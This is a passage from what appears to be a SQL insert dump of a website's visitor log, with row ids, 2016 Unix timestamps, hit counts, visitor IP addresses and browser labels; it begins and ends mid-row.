),(37601,1461812615,1,1,0,0,'141.8.132.105','other'),(37602,1461812655,1,1,0,0,'130.193.50.34','other'),(37603,1461813367,1,1,0,0,'180.76.15.147','other'),(37604,1461815089,1,0,1,0,'66.249.65.104',''),(37605,1461815566,1,0,1,0,'66.249.65.124',''),(37606,1461816960,1,0,1,0,'66.249.65.121',''),(37607,1461816977,2,2,0,0,'141.8.132.105','other'),(37608,1461817247,1,0,1,0,'66.249.65.104',''),(37609,1461817608,1,1,0,0,'162.210.196.130','other'),(37610,1461819734,1,0,1,0,'66.249.65.104',''),(37611,1461820524,1,1,0,0,'91.196.178.65','firefox'),(37612,1461821163,1,1,0,0,'66.249.93.153','chrome'),(37613,1461821401,1,1,0,0,'180.76.15.8','other'),(37614,1461824775,1,1,0,0,'91.196.178.71','chrome'),(37615,1461825487,1,1,0,0,'91.196.178.67','firefox'),(37616,1461825506,1,1,0,0,'5.255.253.113','other'),(37617,1461826109,1,1,0,0,'91.196.178.68','firefox'),(37618,1461827251,1,1,0,0,'37.54.17.22','firefox'),(37619,1461827506,1,0,1,0,'66.249.65.107',''),(37620,1461827927,1,1,0,0,'141.8.132.105','other'),(37621,1461828209,1,1,0,0,'144.76.29.66','other'),(37622,1461829925,2,2,0,0,'66.249.65.118','chrome'),(37623,1461830633,1,0,1,0,'66.249.65.121',''),(37624,1461831195,1,1,0,0,'108.59.8.80','other'),(37625,1461831740,1,1,0,0,'144.76.8.132','other'),(37626,1461832840,1,1,0,0,'95.135.20.239','firefox'),(37627,1461833034,1,1,0,0,'5.255.253.113','other'),(37628,1461833166,4,4,0,0,'141.8.132.105','other'),(37629,1461833275,2,2,0,0,'130.193.50.34','other'),(37630,1461833629,1,1,0,0,'178.154.149.10','other'),(37631,1461836161,1,1,0,0,'95.135.20.239','firefox'),(37632,1461836321,1,1,0,0,'40.77.167.62','other'),(37633,1461839833,1,1,0,0,'91.196.178.66','firefox'),(37634,1461840106,1,1,0,0,'178.94.56.254','opera'),(37635,1461847988,1,1,0,0,'46.201.164.236','opera'),(37636,1461848009,2,2,0,0,'91.196.178.71','chrome'),(37637,1461848524,1,1,0,0,'92.112.53.213','firefox'),(37638,1461849357,1,1,0,0,'91.196.178.67','firefox'),(37639,1461849694,1,0,1,0,'66.249.75.48',''),(37640,1461849768,1,0,1,0,'66.249.69.180',''),(37641,1461851047,1,1,0,0,'91.196.178.68','firefox'),(37642,1461851767,3,3,0,0,'91.196.178.71','firefox'),(37643,1461851952,2,2,0,0,'130.193.50.34','other'),(37644,1461855006,1,1,0,0,'188.166.35.194','other'),(37645,1461857289,1,1,0,0,'130.193.50.34','other'),(37646,1461859976,16,16,0,0,'81.109.65.38','other'),(37647,1461860272,1,1,0,0,'37.54.17.22','firefox'),(37648,1461860837,1,1,0,0,'141.0.14.214','opera'),(37649,1461861901,1,1,0,0,'141.8.183.25','other'),(37650,1461862140,1,1,0,0,'130.193.50.34','other'),(37651,1461865484,2,2,0,0,'130.193.50.34','other'),(37652,1461868305,1,0,1,0,'66.249.75.40',''),(37653,1461868406,1,0,1,0,'66.249.69.175',''),(37654,1461870651,1,1,0,0,'141.8.183.25','other'),(37655,1461870779,1,1,0,0,'5.255.253.113','other'),(37656,1461872094,1,1,0,0,'141.8.132.105','other'),(37657,1461873091,1,1,0,0,'180.76.15.147','other'),(37658,1461873333,1,1,0,0,'66.249.75.32','chrome'),(37659,1461873723,1,1,0,0,'130.193.50.34','other'),(37660,1461875978,1,0,1,0,'66.249.69.175',''),(37661,1461876139,1,1,0,0,'66.249.69.180','chrome'),(37662,1461878593,1,1,0,0,'130.193.50.34','other'),(37663,1461880831,37,37,0,0,'40.77.167.65','other'),(37664,1461880860,54,54,0,0,'40.77.167.66','other'),(37665,1461881566,1,0,1,0,'66.249.75.48',''),(37666,1461883073,18,18,0,0,'51.254.131.245','other'),(37667,1461884347,1,1,0,0,'151.80.41.169','other'),(37668,1461884987,2,2,0,0,'69.30.213.202','other'),(37669,1461886443,1,1,0,0,'40.77.167.67','other'),(37670,1461889248,1,0,1,0,'66.249.69.175',''),(37671,1461890191,1,1,0,0,'130.193.50.34','other'),(37672,1461890846,50,50,0,0,'69.30.213.18','other'),(37673,1461894956,300,300,0,0,'77.248.252.113','other'),(37674,1461895071,1,1,0,0,'130.193.50.34','other'),(37675,1461898606,1,1,0,0,'130.193.51.43','other'),(37676,1461898971,1,0,1,0,'66.249.75.40',''),(37677,1461899412,1,1,0,0,'93.158.152.26','other'),(37678,1461899616,1,1,0,0,'141.8.183.25','other'),(37679,1461901829,5,0,5,0,'66.249.69.170',''),(37680,1461901890,1,0,1,0,'66.249.69.175',''),(37681,1461903949,1,1,0,0,'141.8.132.105','other'),(37682,1461904054,1,1,0,0,'40.77.167.67','other'),(37683,1461905259,1,1,0,0,'130.193.50.34','other'),(37684,1461906288,1,1,0,0,'91.196.178.69','firefox'),(37685,1461906389,1,1,0,0,'91.196.178.67','firefox'),(37686,1461906675,1,1,0,0,'141.8.132.105','other'),(37687,1461907752,1,1,0,0,'91.196.178.69','firefox'),(37688,1461907903,1,1,0,0,'66.249.93.153','chrome'),(37689,1461908081,1,1,0,0,'91.196.178.67','firefox'),(37690,1461909055,1,1,0,0,'91.196.178.69','firefox'),(37691,1461909171,1,1,0,0,'91.196.178.67','chrome'),(37692,1461909349,1,1,0,0,'91.196.178.67','firefox'),(37693,1461909597,1,1,0,0,'130.193.50.34','other'),(37694,1461909740,51,51,0,0,'89.163.148.58','other'),(37695,1461910004,3,3,0,0,'91.196.178.69','firefox'),(37696,1461911413,1,1,0,0,'91.196.178.66','firefox'),(37697,1461911565,1,1,0,0,'130.193.50.34','other'),(37698,1461911725,1,1,0,0,'91.196.178.69','firefox'),(37699,1461914371,1,1,0,0,'91.196.178.69','chrome'),(37700,1461914615,1,1,0,0,'91.196.178.69','firefox'),(37701,1461915689,1,1,0,0,'141.8.132.105','other'),(37702,1461917174,1,1,0,0,'141.8.183.25','other'),(37703,1461917533,1,0,1,0,'66.249.75.32',''),(37704,1461917907,1,1,0,0,'141.8.132.105','other'),(37705,1461917933,1,1,0,0,'91.196.178.66','firefox'),(37706,1461918168,3,3,0,0,'130.193.50.34','other'),(37707,1461918292,1,1,0,0,'93.73.208.215','chrome'),(37708,1461919812,1,1,0,0,'141.8.183.25','other'),(37709,1461921174,1,1,0,0,'37.9.122.201','other'),(37710,1461921584,2,2,0,0,'37.55.57.205','firefox'),(37711,1461922118,2,2,0,0,'91.196.178.69','chrome'),(37712,1461922284,1,1,0,0,'141.8.132.105','other'),(37713,1461922612,1,1,0,0,'37.55.57.205','firefox'),(37714,1461923175,1,1,0,0,'141.8.183.25','other'),(37715,1461923266,1,0,1,0,'66.249.69.175',''),(37716,1461924203,1,1,0,0,'66.249.75.40','chrome'),(37717,1461924448,1,1,0,0,'37.55.57.205','firefox'),(37718,1461925338,1,1,0,0,'66.249.75.32','chrome'),(37719,1461925502,1,1,0,0,'37.55.57.205','firefox'),(37720,1461925923,2,2,0,0,'130.193.50.34','other'),(37721,1461926108,1,1,0,0,'141.8.132.105','other'),(37722,1461927351,1,1,0,0,'141.8.132.105','other'),(37723,1461927588,1,0,1,0,'66.249.75.40',''),(37724,1461927960,1,1,0,0,'91.196.178.71','firefox'),(37725,1461928688,1,1,0,0,'141.8.132.105','other'),(37726,1461929203,1,0,1,0,'66.249.75.48',''),(37727,1461930117,1,1,0,0,'5.255.253.113','other'),(37728,1461930120,1,1,0,0,'130.193.51.83','other'),(37729,1461930150,1,1,0,0,'91.192.132.242','firefox'),(37730,1461930465,1,1,0,0,'141.8.183.25','other'),(37731,1461931459,1,0,1,0,'66.249.75.40',''),(37732,1461931569,1,1,0,0,'130.193.51.83','other'),(37733,1461932022,1,1,0,0,'37.55.57.205','firefox'),(37734,1461937371,1,1,0,0,'95.158.4.162','chrome'),(37735,1461939662,1,1,0,0,'141.8.132.105','other'),(37736,1461939990,1,1,0,0,'130.193.50.34','other'),(37737,1461941523,1,1,0,0,'141.8.132.105','other'),(37738,1461941799,1,1,0,0,'141.8.183.25','other'),(37739,1461942329,1,0,1,0,'66.249.69.180',''),(37740,1461942456,1,1,0,0,'37.55.57.205','firefox'),(37741,1461942727,1,1,0,0,'130.193.50.34','other'),(37742,1461946078,1,1,0,0,'178.154.189.202','other'),(37743,1461946116,2,2,0,0,'37.55.57.205','firefox'),(37744,1461946270,1,1,0,0,'91.196.178.102','chrome'),(37745,1461946562,1,1,0,0,'141.8.183.25','other'),(37746,1461946822,1,1,0,0,'93.158.152.9','other'),(37747,1461947164,1,1,0,0,'23.101.61.176','other'),(37748,1461947176,1,1,0,0,'91.196.178.102','chrome'),(37749,1461947234,1,1,0,0,'92.113.156.98','chrome'),(37750,1461947249,1,1,0,0,'216.163.188.231','firefox'),(37751,1461947379,1,1,0,0,'37.55.57.205','firefox'),(37752,1461947397,1,0,1,0,'66.249.75.40',''),(37753,1461947866,1,1,0,0,'178.154.189.202','other'),(37754,1461947878,4,4,0,0,'91.196.178.167','firefox'),(37755,1461948573,1,1,0,0,'130.193.50.34','other'),(37756,1461949234,1,1,0,0,'91.196.178.102','chrome'),(37757,1461949238,1,1,0,0,'37.53.123.39','chrome'),(37758,1461950467,2,0,2,0,'66.249.75.40',''),(37759,1461950482,2,0,2,0,'66.249.75.32',''),(37760,1461950696,1,1,0,0,'130.193.50.34','other'),(37761,1461950723,1,0,1,0,'66.249.75.48',''),(37762,1461951222,1,1,0,0,'91.196.178.102','chrome'),(37763,1461952156,1,0,1,0,'66.249.75.48',''),(37764,1461953021,1,1,0,0,'91.196.178.65','chrome'),(37765,1461953178,1,1,0,0,'91.196.178.102','chrome'),(37766,1461953377,1,1,0,0,'141.8.132.105','other'),(37767,1461953513,1,1,0,0,'130.193.50.34','other'),(37768,1461953770,1,0,1,0,'66.249.69.180',''),(37769,1461954398,1,0,1,0,'66.249.75.32',''),(37770,1461954439,1,1,0,0,'141.8.132.105','other'),(37771,1461955108,1,1,0,0,'37.55.57.205','firefox'),(37772,1461955519,1,1,0,0,'141.8.132.105','other'),(37773,1461956501,1,1,0,0,'68.135.5.60','other'),(37774,1461957508,1,1,0,0,'130.193.50.201','other'),(37775,1461957522,1,1,0,0,'130.193.50.34','other'),(37776,1461957552,1,1,0,0,'130.193.51.19','other'),(37777,1461957651,1,1,0,0,'141.8.132.105','other'),(37778,1461958374,2,2,0,0,'91.196.178.65','chrome'),(37779,1461959335,1,1,0,0,'141.8.183.25','other'),(37780,1461960229,1,1,0,0,'141.8.132.105','other'),(37781,1461960998,1,1,0,0,'46.211.155.3','chrome'),(37782,1461961243,1,1,0,0,'46.211.5.79','chrome'),(37783,1461961297,1,1,0,0,'5.255.253.113','other'),(37784,1461961425,1,1,0,0,'130.193.50.34','other'),(37785,1461962038,1,1,0,0,'91.196.178.102','chrome'),(37786,1461963568,3,3,0,0,'141.8.132.105','other'),(37787,1461963920,1,1,0,0,'66.249.75.40','chrome'),(37788,1461964442,1,1,0,0,'141.8.183.25','other'),(37789,1461966261,1,1,0,0,'141.8.132.105','other'),(37790,1461966331,1,1,0,0,'130.193.50.34','other'),(37791,1461966398,1,1,0,0,'66.249.75.48','chrome'),(37792,1461969046,1,0,1,0,'66.249.75.32',''),(37793,1461969300,1,1,0,0,'141.8.132.105','other'),(37794,1461969883,2,2,0,0,'130.193.50.34','other'),(37795,1461970586,1,0,1,0,'66.249.69.180',''),(37796,1461970591,1,1,0,0,'94.223.159.42','other'),(37797,1461970930,1,1,0,0,'141.8.183.25','other'),(37798,1461972268,1,1,0,0,'141.8.132.105','other'),(37799,1461973215,1,0,1,0,'66.249.75.48',''),(37800,1461973298,1,0,1,0,'66.249.69.170',''),(37801,1461973343,1,0,1,0,'66.249.75.32',''),(37802,1461973671,1,1,0,0,'141.8.132.10','other'),(37803,1461973797,1,1,0,0,'5.255.253.113','other'),(37804,1461973807,1,1,0,0,'66.249.75.32','chrome'),(37805,1461975020,1,1,0,0,'157.55.39.220','other'),(37806,1461977506,1,1,0,0,'178.24.113.244','other'),(37807,1461977940,1,1,0,0,'141.8.132.105','other'),(37808,1461978066,2,2,0,0,'141.8.183.25','other'),(37809,1461978845,1,1,0,0,'130.193.50.34','other'),(37810,1461979498,3,3,0,0,'69.30.218.234','other'),(37811,1461980295,1,0,1,0,'66.249.69.120',''),(37812,1461980333,1,0,1,0,'66.249.69.104',''),(37813,1461980811,1,1,0,0,'141.8.132.105','other'),(37814,1461982676,1,1,0,0,'141.8.132.105','other'),(37815,1461982695,1,1,0,0,'130.193.50.34','other'),(37816,1461984252,1,0,1,0,'66.249.69.175',''),(37817,1461988197,2,0,2,0,'66.249.69.170',''),(37818,1461988250,1,1,0,0,'141.8.132.105','other'),(37819,1461988295,1,1,0,0,'130.193.50.34','other'),(37820,1461989100,1,1,0,0,'82.145.219.26','other'),(37821,1461989331,1,1,0,0,'94.179.120.26','chrome'),(37822,1461989829,1,1,0,0,'141.8.183.25','other'),(37823,1461989987,1,1,0,0,'180.76.15.153','other'),(37824,1461990939,1,1,0,0,'66.249.69.175','chrome'),(37825,1461991213,1,1,0,0,'130.193.51.83','other'),(37826,1461991337,1,1,0,0,'141.8.142.58','other'),(37827,1461991855,1,1,0,0,'141.8.132.105','other'),(37828,1461992313,1,1,0,0,'130.193.50.34','other'),(37829,1461992920,1,1,0,0,'157.55.39.223','other'),(37830,1461993615,1,1,0,0,'37.55.57.205','firefox'),(37831,1461994064,1,1,0,0,'66.249.69.120','chrome'),(37832,1461995843,1,1,0,0,'5.255.253.113','other'),(37833,1461997593,1,0,1,0,'66.249.69.175',''),(37834,1461997747,1,1,0,0,'130.193.50.34','other'),(37835,1461997958,1,1,0,0,'37.55.57.205','firefox'),(37836,1461999689,1,1,0,0,'66.249.93.153','chrome'),(37837,1462001410,1,1,0,0,'141.8.183.25','other'),(37838,1462001664,2,2,0,0,'130.193.50.34','other'),(37839,1462001733,1,1,0,0,'37.55.57.205','firefox'),(37840,1462001913,1,1,0,0,'5.228.75.99','chrome'),(37841,1462002337,1,0,1,0,'66.249.69.120',''),(37842,1462002538,1,1,0,0,'93.158.152.202','other'),(37843,1462002791,1,0,1,0,'66.249.69.112',''),(37844,1462003078,1,0,1,0,'66.249.69.104',''),(37845,1462003514,1,0,1,0,'66.249.69.180',''),(37846,1462004743,1,1,0,0,'157.55.39.221','other'),(37847,1462004931,1,0,1,0,'66.249.69.104',''),(37848,1462005892,1,1,0,0,'37.55.57.205','firefox'),(37849,1462008062,1,1,0,0,'141.8.183.25','other'),(37850,1462008643,1,0,1,0,'66.249.69.112',''),(37851,1462008671,3,3,0,0,'91.196.178.68','other'),(37852,1462010308,2,2,0,0,'130.193.50.34','other'),(37853,1462010321,1,0,1,0,'66.249.69.175',''),(37854,1462010692,1,0,1,0,'66.249.69.104',''),(37855,1462010712,1,1,0,0,'37.55.57.205','firefox'),(37856,1462011118,1,0,1,0,'66.249.69.112',''),(37857,1462012154,1,0,1,0,'66.249.69.120',''),(37858,1462015394,122,122,0,0,'144.76.61.21','other'),(37859,1462016266,1,0,1,0,'66.249.69.170',''),(37860,1462016594,1,1,0,0,'141.8.183.25','other'),(37861,1462016879,1,1,0,0,'130.193.50.34','other'),(37862,1462017736,1,0,1,0,'66.249.69.170',''),(37863,1462018018,1,1,0,0,'130.193.50.34','other'),(37864,1462018069,1,0,1,0,'66.249.69.180',''),(37865,1462019130,1,0,1,0,'66.249.69.170',''),(37866,1462019203,1,1,0,0,'207.46.13.56','other'),(37867,1462019216,1,1,0,0,'46.201.211.127','firefox'),(37868,1462020884,1,1,0,0,'91.196.178.37','firefox'),(37869,1462021019,1,1,0,0,'37.55.57.205','firefox'),(37870,1462021620,1,1,0,0,'168.235.205.205','other'),(37871,1462021636,1,1,0,0,'91.196.178.40','other'),(37872,1462021999,1,1,0,0,'130.193.50.34','other'),(37873,1462022439,1,1,0,0,'37.55.57.205','firefox'),(37874,1462023146,1,1,0,0,'93.158.152.202','other'),(37875,1462023161,2,2,0,0,'66.249.69.104','chrome'),(37876,1462023973,1,0,1,0,'66.249.69.120',''),(37877,1462024996,1,1,0,0,'66.249.64.113','chrome'),(37878,1462025653,1,1,0,0,'91.196.178.68','chrome'),(37879,1462025821,1,1,0,0,'66.249.64.249','chrome'),(37880,1462025968,1,0,1,0,'66.249.64.113',''),(37881,1462026765,242,242,0,0,'144.76.29.66','other'),(37882,1462026866,1,1,0,0,'91.196.178.68','chrome'),(37883,1462027352,1,1,0,0,'130.193.50.34','other'),(37884,1462029045,1,1,0,0,'141.8.132.105','other'),(37885,1462029687,244,244,0,0,'213.239.205.207','other'),(37886,1462031172,1,0,1,0,'66.249.64.118',''),(37887,1462031986,1,1,0,0,'130.193.50.34','other'),(37888,1462032172,1,1,0,0,'37.55.57.205','firefox'),(37889,1462032557,1,1,0,0,'178.62.206.238','other'),(37890,1462032911,1,1,0,0,'130.193.50.34','other'),(37891,1462033392,1,1,0,0,'207.46.13.56','other'),(37892,1462034394,1,1,0,0,'130.193.50.34','other'),(37893,1462035140,2,0,2,0,'66.249.64.113',''),(37894,1462035196,1,0,1,0,'66.249.64.239',''),(37895,1462037227,1,1,0,0,'91.196.178.68','chrome'),(37896,1462037488,1,1,0,0,'93.158.152.203','other'),(37897,1462037682,1,1,0,0,'216.163.188.237','firefox'),(37898,1462038270,1,1,0,0,'91.196.178.68','chrome'),(37899,1462038494,1,1,0,0,'141.8.132.105','other'),(37900,1462039915,1,1,0,0,'130.193.50.34','other'),(37901,1462041570,1,1,0,0,'85.26.183.42','chrome'),(37902,1462041579,1,1,0,0,'37.72.132.228','chrome'),(37903,1462041674,1,1,0,0,'141.8.132.105','other'),(37904,1462042572,1,1,0,0,'176.77.64.185','chrome'),(37905,1462042596,1,1,0,0,'130.193.50.34','other'),(37906,1462042600,1,1,0,0,'141.8.132.105','other'),(37907,1462044874,1,1,0,0,'91.196.178.102','chrome'),(37908,1462045185,1,1,0,0,'91.196.178.100','chrome'),(37909,1462045227,1,1,0,0,'51.254.97.23','other'),(37910,1462045367,2,2,0,0,'130.193.50.34','other'),(37911,1462049138,1,1,0,0,'178.154.189.202','other'),(37912,1462052391,1,1,0,0,'83.149.126.98','other'),(37913,1462053274,1,1,0,0,'130.193.50.4','other'),(37914,1462054653,1,0,1,0,'66.249.64.239',''),(37915,1462058802,1,0,1,0,'66.249.64.113',''),(37916,1462061207,1,1,0,0,'93.158.152.51','other'),(37917,1462063522,1,1,0,0,'180.76.15.7','other'),(37918,1462065249,1,1,0,0,'141.8.142.62','other'),(37919,1462065253,1,1,0,0,'5.255.253.47','other'),(37920,1462065486,1,1,0,0,'66.249.64.113','chrome'),(37921,1462066292,1,0,1,0,'66.249.64.244',''),(37922,1462066384,4,4,0,0,'213.251.184.38','other'),(37923,1462066472,1,1,0,0,'5.255.253.26','other'),(37924,1462069314,1,1,0,0,'130.193.50.34','other'),(37925,1462072165,1,1,0,0,'66.249.64.249','chrome'),(37926,1462072190,1,1,0,0,'141.8.132.105','other'),(37927,1462074259,1,1,0,0,'94.23.46.192','other'),(37928,1462075505,1,0,1,0,'66.249.64.108',''),(37929,1462075957,1,1,0,0,'82.145.218.189','other'),(37930,1462077096,1,0,1,0,'66.249.64.244',''),(37931,1462077277,6,6,0,0,'176.9.131.69','other'),(37932,1462077402,1,1,0,0,'141.8.183.25','other'),(37933,1462081066,1,1,0,0,'130.193.51.83','other'),(37934,1462083178,1,1,0,0,'5.255.253.113','other'),(37935,1462084519,1,1,0,0,'130.193.50.34','other'),(37936,1462085400,1,1,0,0,'37.9.122.202','other'),(37937,1462085769,1,1,0,0,'130.193.50.34','other'),(37938,1462085977,1,1,0,0,'37.55.57.205','firefox'),(37939,1462087888,1,1,0,0,'130.193.50.34','other'),(37940,1462088128,1,0,1,0,'66.249.64.108',''),(37941,1462089147,1,1,0,0,'130.193.50.34','other'),(37942,1462089946,1,1,0,0,'66.249.93.147','chrome'),(37943,1462090806,1,1,0,0,'93.158.152.84','other'),(37944,1462090839,1,1,0,0,'141.8.183.25','other'),(37945,1462094094,1,1,0,0,'141.8.132.105','other'),(37946,1462095977,1,0,1,0,'66.249.64.239',''),(37947,1462096982,1,0,1,0,'66.249.64.113',''),(37948,1462097167,1,1,0,0,'180.76.15.30','other'),(37949,1462097476,1,1,0,0,'141.8.183.25','other'),(37950,1462097688,3,3,0,0,'130.193.50.34','other'),(37951,1462100709,2,2,0,0,'130.193.50.34','other'),(37952,1462102764,2,2,0,0,'141.8.142.61','other'),(37953,1462105255,1,1,0,0,'141.8.183.25','other'),(37954,1462105763,1,1,0,0,'37.55.57.205','firefox'),(37955,1462105783,1,1,0,0,'141.8.132.105','other'),(37956,1462107617,2,2,0,0,'130.193.50.34','other'),(37957,1462108216,1,0,1,0,'66.249.78.143',''),(37958,1462108349,2,2,0,0,'141.8.183.25','other'),(37959,1462109760,1,1,0,0,'130.193.50.34','other'),(37960,1462111453,1,0,1,0,'66.249.78.164',''),(37961,1462112177,1,1,0,0,'5.255.253.113','other'),(37962,1462112555,1,1,0,0,'130.193.50.34','other'),(37963,1462113319,1,1,0,0,'107.189.60.80','other'),(37964,1462114698,1,1,0,0,'141.8.132.105','other'),(37965,1462114998,1,1,0,0,'130.193.50.34','other'),(37966,1462116764,2,2,0,0,'130.193.50.34','other'),(37967,1462116891,1,1,0,0,'141.8.132.105','other'),(37968,1462117488,1,1,0,0,'91.196.178.69','other'),(37969,1462117866,1,1,0,0,'37.55.57.205','firefox'),(37970,1462118616,2,2,0,0,'91.196.178.165','chrome'),(37971,1462119361,1,1,0,0,'130.193.50.34','other'),(37972,1462119574,1,1,0,0,'130.193.51.83','other'),(37973,1462119705,1,0,1,0,'66.249.78.171',''),(37974,1462120304,1,1,0,0,'141.8.132.105','other'),(37975,1462120621,1,1,0,0,'130.193.50.34','other'),(37976,1462121580,2,2,0,0,'130.193.50.34','other'),(37977,1462122493,1,0,1,0,'66.249.78.136',''),(37978,1462124201,1,1,0,0,'141.8.132.105','other'),(37979,1462126524,1,0,1,0,'66.249.78.171',''),(37980,1462126804,2,2,0,0,'130.193.50.34','other'),(37981,1462128393,1,0,1,0,'66.249.78.178',''),(37982,1462129508,1,1,0,0,'37.55.57.205','firefox'),(37983,1462130373,1,1,0,0,'66.249.78.171','chrome'),(37984,1462130751,1,1,0,0,'37.157.193.84','other'),(37985,1462131106,1,1,0,0,'130.193.51.83','other'),(37986,1462131717,1,1,0,0,'141.8.132.105','other'),(37987,1462132105,2,2,0,0,'130.193.50.34','other'),(37988,1462132827,1,1,0,0,'141.8.183.25','other'),(37989,1462133608,1,1,0,0,'130.193.50.34','other'),(37990,1462133973,1,0,1,0,'66.249.66.76',''),(37991,1462136145,1,1,0,0,'195.137.226.26','chrome'),(37992,1462136978,1,1,0,0,'130.193.50.34','other'),(37993,1462137458,1,1,0,0,'69.30.210.242','other'),(37994,1462138264,1,0,1,0,'66.249.78.143',''),(37995,1462141518,2,2,0,0,'157.55.39.220','other'),(37996,1462141524,1,1,0,0,'157.55.39.152','other'),(37997,1462141529,1,1,0,0,'207.46.13.56','other'),(37998,1462141846,1,1,0,0,'178.154.189.201','other'),(37999,1462144975,1,0,1,0,'66.249.78.136',''),(38000,1462147819,1,1,0,0,'144.76.93.46','other'),(38001,1462148136,3,2,1,0,'185.46.150.146',''),(38002,1462148566,1,0,1,0,'66.249.78.171',''),(38003,1462151059,1,0,1,0,'66.249.78.143',''),(38004,1462152137,1,0,1,0,'66.249.78.136',''),(38005,1462152442,1,1,0,0,'5.255.253.113','other'),(38006,1462155482,1,0,1,0,'66.249.66.82',''),(38007,1462155525,1,0,1,0,'66.249.66.79',''),(38008,1462160679,1,1,0,0,'141.0.15.117','other'),(38009,1462161372,1,0,1,0,'66.249.66.82',''),(38010,1462161779,2,2,0,0,'130.193.50.34','other'),(38011,1462162297,1,0,1,0,'66.249.66.82',''),(38012,1462162301,1,0,1,0,'66.249.66.60',''),(38013,1462162942,1,0,1,0,'66.249.66.57',''),(38014,1462166449,1,0,1,0,'66.249.66.60',''),(38015,1462169197,2,0,2,0,'66.249.78.136',''),(38016,1462169345,1,0,1,0,'66.249.78.150',''),(38017,1462172355,1,1,0,0,'37.54.23.238','firefox'),(38018,1462172421,1,1,0,0,'66.249.78.136','chrome'),(38019,1462172897,2,2,0,0,'130.193.50.34','other'),(38020,1462173055,1,0,1,0,'66.249.66.82',''),(38021,1462173255,1,1,0,0,'141.0.15.176','other'),(38022,1462173802,1,1,0,0,'37.54.23.238','firefox'),(38023,1462174625,1,1,0,0,'66.249.93.147','chrome'),(38024,1462174884,1,1,0,0,'130.193.50.34','other'),(38025,1462177851,1,0,1,0,'66.249.78.171',''),(38026,1462178765,239,239,0,0,'51.254.97.218','other'),(38027,1462180888,1,1,0,0,'37.54.23.238','firefox'),(38028,1462181582,1,0,1,0,'66.249.78.150',''),(38029,1462181615,1,1,0,0,'66.249.78.143','chrome'),(38030,1462183199,1,1,0,0,'46.133.233.154','other'),(38031,1462184485,1,1,0,0,'46.133.221.126','other'),(38032,1462185301,1,1,0,0,'130.193.50.34','other'),(38033,1462186138,1,0,1,0,'66.249.78.143',''),(38034,1462186217,1,1,0,0,'37.54.23.238','firefox'),(38035,1462187273,2,2,0,0,'46.119.113.162','other'),(38036,1462187554,2,0,2,0,'66.249.78.143',''),(38037,1462187779,46,46,0,0,'94.199.151.22','other'),(38038,1462189011,1,1,0,0,'91.196.178.37','firefox'),(38039,1462189946,2,2,0,0,'46.119.113.162','other'),(38040,1462190154,1,1,0,0,'141.8.183.25','other'),(38041,1462190594,1,1,0,0,'130.193.50.34','other'),(38042,1462191380,1,0,1,0,'66.249.78.150',''),(38043,1462192087,1,0,1,0,'66.249.78.164',''),(38044,1462192629,2,0,2,0,'66.249.78.143',''),(38045,1462193157,1,1,0,0,'130.193.50.34','other'),(38046,1462194044,1,1,0,0,'141.8.184.22','other'),(38047,1462194047,1,1,0,0,'141.8.142.67','other'),(38048,1462195397,1,1,0,0,'180.76.15.22','other'),(38049,1462196162,1,1,0,0,'141.8.132.105','other'),(38050,1462196898,1,1,0,0,'130.193.50.34','other'),(38051,1462196962,2,0,2,0,'66.249.78.143',''),(38052,1462196980,3,0,3,0,'66.249.78.136',''),(38053,1462196997,1,0,1,0,'66.249.66.54',''),(38054,1462197406,1,1,0,0,'180.76.15.24','other'),(38055,1462198805,1,1,0,0,'37.54.23.238','firefox'),(38056,1462199077,1,1,0,0,'5.255.253.113','other'),(38057,1462199688,1,1,0,0,'188.166.45.104','other'),(38058,1462199870,1,1,0,0,'37.54.23.238','firefox'),(38059,1462200834,1,1,0,0,'91.196.178.67','firefox'),(38060,1462201151,1,1,0,0,'88.233.253.179','other'),(38061,1462201297,1,1,0,0,'130.193.50.34','other'),(38062,1462202448,1,1,0,0,'141.8.132.105','other'),(38063,1462205885,1,0,1,0,'66.249.78.150',''),(38064,1462205896,1,0,1,0,'66.249.78.136',''),(38065,1462205962,1,0,1,0,'66.249.78.143',''),(38066,1462206070,1,0,1,0,'66.249.78.171',''),(38067,1462206132,2,2,0,0,'141.8.142.61','other'),(38068,1462206648,1,1,0,0,'130.193.50.34','other'),(38069,1462207137,1,1,0,0,'37.54.23.238','firefox'),(38070,1462208850,1,1,0,0,'130.193.50.34','other'),(38071,1462210296,1,1,0,0,'46.133.112.181','other'),(38072,1462213389,1,1,0,0,'130.193.50.34','other'),(38073,1462216510,1,1,0,0,'199.58.86.211','other'),(38074,1462217016,1,1,0,0,'130.193.50.34','other'),(38075,1462218334,1,1,0,0,'95.158.37.140','other'),(38076,1462218408,1,1,0,0,'130.193.50.34','other'),(38077,1462218538,1,1,0,0,'141.8.132.105','other'),(38078,1462219558,1,1,0,0,'193.194.127.217','firefox'),(38079,1462220048,1,1,0,0,'66.249.78.178','chrome'),(38080,1462222367,1,1,0,0,'130.193.50.34','other'),(38081,1462222681,1,0,1,0,'66.249.78.171',''),(38082,1462222682,1,0,1,0,'66.249.66.76',''),(38083,1462222822,2,0,2,0,'66.249.78.143',''),(38084,1462222888,1,0,1,0,'66.249.78.136',''),(38085,1462223352,36,0,36,0,'68.180.229.171',''),(38086,1462224435,1,0,1,0,'68.180.229.171',''),(38087,1462225625,1,0,1,0,'68.180.229.171',''),(38088,1462225874,1,0,1,0,'66.249.78.164',''),(38089,1462226482,1,0,1,0,'66.249.78.136',''),(38090,1462227286,2,0,2,0,'68.180.229.171',''),(38091,1462227531,1,1,0,0,'130.193.50.34','other'),(38092,1462228589,1,0,1,0,'66.249.78.164',''),(38093,1462229972,1,1,0,0,'141.8.132.41','other'),(38094,1462231839,1,1,0,0,'130.193.50.34','other'),(38095,1462234243,1,0,1,0,'66.249.78.136',''),(38096,1462236555,1,0,1,0,'66.249.78.178',''),(38097,1462242058,1,0,1,0,'66.249.78.143',''),(38098,1462243552,1,1,0,0,'82.145.216.166','other'),(38099,1462251437,1,0,1,0,'66.249.78.171',''),(38100,1462253873,1,0,1,0,'66.249.78.150',''),(38101,1462253915,1,1,0,0,'66.249.93.150','chrome'),(38102,1462254218,1,0,1,0,'66.249.78.136',''),(38103,1462255742,1,0,1,0,'66.249.78.178',''),(38104,1462259038,1,1,0,0,'194.50.254.134','firefox'),(38105,1462260142,1,1,0,0,'66.249.78.164','chrome'),(38106,1462260731,1,1,0,0,'66.249.78.178','chrome'),(38107,1462260747,3,3,0,0,'66.249.78.171','chrome'),(38108,1462261861,1,1,0,0,'66.249.78.171','chrome'),(38109,1462262387,1,1,0,0,'91.196.178.130','chrome'),(38110,1462262401,1,1,0,0,'141.8.132.105','other'),(38111,1462263345,1,1,0,0,'37.54.23.238','firefox'),(38112,1462265081,1,0,1,0,'66.249.78.150',''),(38113,1462267323,1,1,0,0,'91.19